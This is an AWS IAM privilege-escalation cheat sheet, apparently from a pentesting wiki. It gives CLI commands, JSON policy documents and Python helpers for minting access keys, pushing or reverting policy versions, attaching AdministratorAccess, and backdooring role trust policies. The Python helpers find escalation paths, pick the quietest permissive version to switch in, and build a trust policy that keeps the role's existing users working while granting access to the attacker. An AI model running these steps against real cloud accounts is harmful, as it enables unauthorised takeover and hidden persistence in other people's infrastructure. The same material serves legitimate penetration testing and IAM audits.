# Identity Access Management (IAM)

## iam:CreateAccessKey

* With access to this permission, an attacker can create a new pair of access keys for any IAM user the permission covers, including a more privileged user they do not otherwise control, and use them for persistent programmatic access as that user. Each user can hold at most two access keys, so the call fails when both slots are taken; the ListAccessKeys API shows what already exists.

{% code overflow="wrap" %}

```bash
aws iam create-access-key --user-name <userName>
```

{% endcode %}
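Before trying any of the commands on this page, it is worth checking which of the abused actions the current identity actually has. The following is an added example (Python, not code from the original page) that takes the identity policy documents already pulled for the caller and reports, for each action covered here, whether it is allowed, denied, only conditionally allowed, or not granted at all. The sample policy documents, account ID and policy name are constructed placeholders. It implements IAM's action wildcard and Deny-wins rules but ignores NotAction, permission boundaries, SCPs and resource policies, so treat it as triage; `aws iam simulate-principal-policy` remains the authoritative check.

```python
import fnmatch

# IAM actions abused on this page and what each one buys the attacker.
PRIVESC_ACTIONS = {
    "iam:CreateAccessKey": "persistence: mint new access keys for a user",
    "iam:CreatePolicyVersion": "privesc: push a new default version of a managed policy",
    "iam:SetDefaultPolicyVersion": "privesc: switch to an existing, more permissive version",
    "iam:AttachUserPolicy": "privesc: attach AdministratorAccess (or any policy) to a user",
    "iam:UpdateAssumeRolePolicy": "privesc: rewrite a role's trust policy, then assume it",
}

# Constructed sample: identity policy documents pulled for the current caller
# (e.g. from `aws iam get-policy-version` / `get-user-policy`), in the shape the
# CLI prints them. Account ID and policy name are placeholders.
SAMPLE_POLICIES = [
    {"Version": "2012-10-17", "Statement": [
        {"Effect": "Allow", "Action": ["iam:List*", "iam:Get*"], "Resource": "*"},
        # lowercase on purpose: IAM action matching is case-insensitive
        {"Effect": "Allow", "Action": "iam:createpolicyversion",
         "Resource": "arn:aws:iam::123456789012:policy/dev-*"},
        {"Effect": "Allow", "Action": "iam:Update*", "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:AttachUserPolicy", "Resource": "*",
         "Condition": {"IpAddress": {"aws:SourceIp": "10.0.0.0/8"}}},
    ]},
    {"Version": "2012-10-17", "Statement": [
        {"Effect": "Deny", "Action": "iam:CreateAccessKey", "Resource": "*"},
    ]},
]


def _as_list(value):
    """Most IAM policy fields may be a single string or a list of strings."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def action_matches(pattern, action):
    """IAM action matching: case-insensitive, with '*' and '?' wildcards."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def evaluate_action(policies, action):
    """Return (verdict, resources) for one action across all policy documents.

    Verdicts: 'denied' (an unconditional Deny wins over everything), 'allowed'
    (unconditional Allow and no Deny at all), 'conditional' (the matching
    Allows or Denys carry a Condition, which cannot be resolved offline), or
    'not-granted'. NotAction statements are skipped rather than guessed at.
    """
    allowed, conditional = [], []
    hard_deny = soft_deny = False
    for doc in policies:
        for stmt in _as_list(doc.get("Statement")):
            if "NotAction" in stmt:
                continue
            if not any(action_matches(p, action) for p in _as_list(stmt.get("Action"))):
                continue
            resources = _as_list(stmt.get("Resource"))
            has_condition = "Condition" in stmt
            if stmt.get("Effect") == "Deny":
                if has_condition:
                    soft_deny = True
                else:
                    hard_deny = True
            elif stmt.get("Effect") == "Allow":
                (conditional if has_condition else allowed).extend(resources)
    if hard_deny:
        return "denied", []
    if allowed and not soft_deny:
        return "allowed", sorted(set(allowed))
    if allowed or conditional:
        return "conditional", sorted(set(allowed + conditional))
    return "not-granted", []


def find_privesc_paths(policies):
    """Map every action covered on this page to its verdict for these policies."""
    return {action: evaluate_action(policies, action) for action in PRIVESC_ACTIONS}


if __name__ == "__main__":
    for action, (verdict, resources) in find_privesc_paths(SAMPLE_POLICIES).items():
        print(f"{verdict:<12} {action:<30} {PRIVESC_ACTIONS[action]}")
        for resource in resources:
            print(f"{'':<12}   on {resource}")
```

With the sample documents the output flags iam:CreatePolicyVersion as allowed only on policies matching `dev-*`, iam:UpdateAssumeRolePolicy as allowed everywhere (through the `iam:Update*` wildcard), iam:AttachUserPolicy as conditional on source IP, and iam:CreateAccessKey as explicitly denied; resource scoping matters, because a CreatePolicyVersion grant limited to a policy that is not attached to anything useful is no escalation path.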

***

## iam:CreatePolicyVersion and iam:SetDefaultPolicyVersion

* With access to these permissions, an attacker can create a new version of a customer managed policy that is attached to their own identity (or to one they control) and make it the default, escalating their privileges. The `--set-as-default` flag is evaluated as part of CreatePolicyVersion, so iam:CreatePolicyVersion alone is usually enough for this path. A managed policy can hold at most five versions; once that limit is reached an old, non-default version must be deleted first, which additionally requires iam:DeletePolicyVersion.

{% code overflow="wrap" %}

```bash
aws iam create-policy-version --policy-arn arn:aws:iam::<accountId>:policy/<policyName> --policy-document file://<policyName>.json --set-as-default
```

{% endcode %}

Example policy document for `<policyName>.json`, granting full S3 access:

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Action": "s3:*",
            "Resource": "*"
        }
    ]
}
```

***

## iam:SetExistingDefaultPolicyVersion

* The IAM action behind this path is iam:SetDefaultPolicyVersion; it differs from the previous one in that no new version is created. With it, an attacker can make a different, already existing version of a managed policy the default, potentially escalating privileges or gaining access to other resources if an older version was more permissive. Reading the versions first requires iam:ListPolicyVersions and iam:GetPolicyVersion; without them, version IDs can still be guessed, since they follow the pattern v1, v2, and so on.

{% code overflow="wrap" %}

```bash
# view available versions of a policy
aws iam list-policy-versions --policy-arn <policyArn>

# view the policy for a particular version
aws iam get-policy-version --policy-arn <policyArn> --version-id <versionId>

# make a specific existing version the default (the one that is actually enforced)
aws iam set-default-policy-version --policy-arn <policyArn> --version-id <versionId>
```

{% endcode %}
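Both version-based paths above come down to two questions: can a new version still be created (or which one has to be deleted first), and which existing non-default version is worth switching to. The following added example (Python, not code from the original page) answers both offline from the data the `list-policy-versions` and `get-policy-version` commands return. The version records, dates and policy contents are constructed samples, and the probe actions used to score a version are an arbitrary choice that should be adapted to the target.

```python
import fnmatch

MAX_POLICY_VERSIONS = 5  # IAM hard limit per customer managed policy

# Probe actions used to judge how much a version grants; pick what matters to you.
PROBE_ACTIONS = [
    "iam:CreateUser", "sts:AssumeRole", "s3:GetObject",
    "secretsmanager:GetSecretValue", "ec2:RunInstances", "lambda:InvokeFunction",
]

# Constructed sample: one policy's versions, merging what `list-policy-versions`
# returns (VersionId, IsDefaultVersion, CreateDate) with the Document that
# `get-policy-version` prints for each version. Dates and contents are made up.
SAMPLE_VERSIONS = [
    {"VersionId": "v1", "IsDefaultVersion": False, "CreateDate": "2023-01-10T12:00:00+00:00",
     "Document": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Action": "*", "Resource": "*"}]}},
    {"VersionId": "v2", "IsDefaultVersion": False, "CreateDate": "2023-03-02T09:30:00+00:00",
     "Document": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Action": ["s3:Get*", "s3:List*"], "Resource": "*"}]}},
    {"VersionId": "v3", "IsDefaultVersion": True, "CreateDate": "2023-06-15T16:45:00+00:00",
     "Document": {"Version": "2012-10-17", "Statement": [
         {"Effect": "Allow", "Action": "s3:ListBucket", "Resource": "arn:aws:s3:::app-logs"}]}},
]


def _as_list(value):
    """IAM policy fields may be a single string or a list of strings."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def grants(document, action):
    """True if an unconditional Allow statement in document matches action."""
    for stmt in _as_list(document.get("Statement")):
        if stmt.get("Effect") != "Allow" or "Condition" in stmt:
            continue
        if any(fnmatch.fnmatchcase(action.lower(), p.lower())
               for p in _as_list(stmt.get("Action"))):
            return True
    return False


def rank_versions(versions, probes=PROBE_ACTIONS):
    """Order the non-default versions by how many probe actions they grant.

    Returns a list of (VersionId, granted_probes) with the most permissive
    first; the current default is excluded because switching to it changes nothing.
    """
    ranked = []
    for v in versions:
        if v.get("IsDefaultVersion"):
            continue
        granted = [a for a in probes if grants(v["Document"], a)]
        ranked.append((v["VersionId"], granted))
    ranked.sort(key=lambda item: len(item[1]), reverse=True)
    return ranked


def new_version_plan(versions):
    """Can a new version be created, or must an old one be deleted first?

    IAM refuses CreatePolicyVersion once a policy already has
    MAX_POLICY_VERSIONS versions. The default version cannot be deleted, so
    the oldest non-default one is the candidate (needs iam:DeletePolicyVersion).
    """
    if len(versions) < MAX_POLICY_VERSIONS:
        return {"can_create": True, "delete_first": None}
    candidates = [v for v in versions if not v.get("IsDefaultVersion")]
    oldest = min(candidates, key=lambda v: v["CreateDate"])
    return {"can_create": False, "delete_first": oldest["VersionId"]}


if __name__ == "__main__":
    print("create new version:", new_version_plan(SAMPLE_VERSIONS))
    for version_id, granted in rank_versions(SAMPLE_VERSIONS):
        print(f"{version_id}: grants {len(granted)} probe actions -> {granted}")
```

In the sample, v1 (a forgotten `Action: "*"` version) outranks everything, so `set-default-policy-version --version-id v1` is the quieter move: no new version is created and nothing new is written to the policy, only the default pointer changes.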

***

## iam:AttachUserPolicy

* With access to this permission, an attacker can attach any managed policy, including the AWS managed AdministratorAccess policy, to an IAM user they control, escalating privileges or gaining access to other resources in a single call.

{% code overflow="wrap" %}

```bash
aws iam attach-user-policy --policy-arn arn:aws:iam::aws:policy/AdministratorAccess --user-name <userName>
```

{% endcode %}

***

## iam:UpdateAssumeRolePolicy

* With access to this permission, an attacker can overwrite an IAM role's trust policy so that an identity they control (a user, role or service) is allowed to assume the role, gaining whatever the role's permissions policies grant. The call replaces the whole document, so existing trusted principals must be repeated or the role's legitimate consumers break. If the new principal is the caller's own ARN, the trust policy alone is sufficient; if it is an account root ARN, the caller also needs sts:AssumeRole in its own identity policy.

{% code overflow="wrap" %}

```bash
aws iam update-assume-role-policy --role-name <roleName> --policy-document file://<trustPolicy>.json
```

{% endcode %}

Example trust policy for `<trustPolicy>.json`, allowing a single IAM user to assume the role:

```json
{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<accountId>:user/<userName>"
            },
            "Action": "sts:AssumeRole"
        }
    ]
}
```
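Since UpdateAssumeRolePolicy replaces the whole trust document, the practical move is to fetch the current one, append a statement for the attacker's principal, and push the result back, so the role keeps working for whoever used it before. The following added example (Python, not code from the original page) does the append and also evaluates, for a given caller ARN, whether the resulting trust policy lets it assume the role, including the root-principal case that additionally needs sts:AssumeRole on the identity side. The original trust policy, account ID and user name are constructed placeholders; Conditions are not evaluated and are reported as such.

```python
import copy
import fnmatch
import json

# Constructed sample: the trust policy of a role that only Lambda may assume, in
# the shape `aws iam get-role` prints under Role.AssumeRolePolicyDocument.
# Account ID and user name are placeholders.
ORIGINAL_TRUST_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow",
         "Principal": {"Service": "lambda.amazonaws.com"},
         "Action": "sts:AssumeRole"}
    ],
}
ATTACKER_ARN = "arn:aws:iam::123456789012:user/attacker"


def _as_list(value):
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _account_of(arn):
    """Account ID field of an ARN (arn:partition:service:region:account:resource)."""
    return arn.split(":")[4]


def _aws_principals(stmt):
    """The AWS principals of a statement: '*' or the Principal.AWS entries."""
    principal = stmt.get("Principal")
    if principal == "*":
        return ["*"]
    if isinstance(principal, dict):
        return _as_list(principal.get("AWS"))
    return []


def _principal_match(entry, caller_arn):
    """'exact' for the caller itself or '*', 'account' for the caller's account
    root (as an ARN or a bare 12-digit account ID), None for no match."""
    account = _account_of(caller_arn)
    if entry in ("*", caller_arn):
        return "exact"
    if entry in (account, f"arn:aws:iam::{account}:root"):
        return "account"
    return None


def can_assume(trust_policy, caller_arn, has_identity_assume_role=False):
    """Verdict on whether caller_arn may call sts:AssumeRole on this role.

    'denied': an unconditional Deny matches the caller (exactly or via account).
    'allowed': an unconditional Allow names the caller ARN or '*'.
    'allowed-needs-identity-policy': the only Allow names the account root, so
        the caller also needs sts:AssumeRole in its own identity policy; with
        has_identity_assume_role=True this becomes 'allowed'.
    'conditional': a matching statement carries a Condition not evaluated here.
    'not-trusted': nothing in the trust policy covers the caller.
    """
    verdict, soft_deny = None, False
    for stmt in _as_list(trust_policy.get("Statement")):
        if not any(fnmatch.fnmatchcase("sts:assumerole", a.lower())
                   for a in _as_list(stmt.get("Action"))):
            continue
        matches = [m for m in (_principal_match(e, caller_arn)
                               for e in _aws_principals(stmt)) if m]
        if not matches:
            continue
        is_deny, has_condition = stmt.get("Effect") == "Deny", "Condition" in stmt
        if is_deny and not has_condition:
            return "denied"
        if is_deny:
            soft_deny = True
        elif has_condition:
            verdict = verdict or "conditional"
        elif "exact" in matches or has_identity_assume_role:
            verdict = "allowed"
        elif verdict != "allowed":
            verdict = "allowed-needs-identity-policy"
    if verdict is None:
        return "not-trusted"
    return "conditional" if soft_deny else verdict


def add_trusted_principal(trust_policy, principal_arn):
    """Copy of trust_policy with one extra Allow statement for principal_arn.

    Appending, rather than replacing the document, keeps the existing trust
    (here the Lambda service) intact, so the role's legitimate consumers keep
    working and nothing visibly breaks.
    """
    new_doc = copy.deepcopy(trust_policy)
    new_doc["Statement"] = _as_list(new_doc.get("Statement")) + [{
        "Effect": "Allow",
        "Principal": {"AWS": principal_arn},
        "Action": "sts:AssumeRole",
    }]
    return new_doc


if __name__ == "__main__":
    print("before:", can_assume(ORIGINAL_TRUST_POLICY, ATTACKER_ARN))
    backdoored = add_trusted_principal(ORIGINAL_TRUST_POLICY, ATTACKER_ARN)
    print("after: ", can_assume(backdoored, ATTACKER_ARN))
    # Save this as <trustPolicy>.json and pass it to update-assume-role-policy.
    print(json.dumps(backdoored, indent=4))
```

After the update lands, the role is assumed with `aws sts assume-role --role-arn <roleArn> --role-session-name <name>` and the temporary credentials it returns are exported into the environment or a profile.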

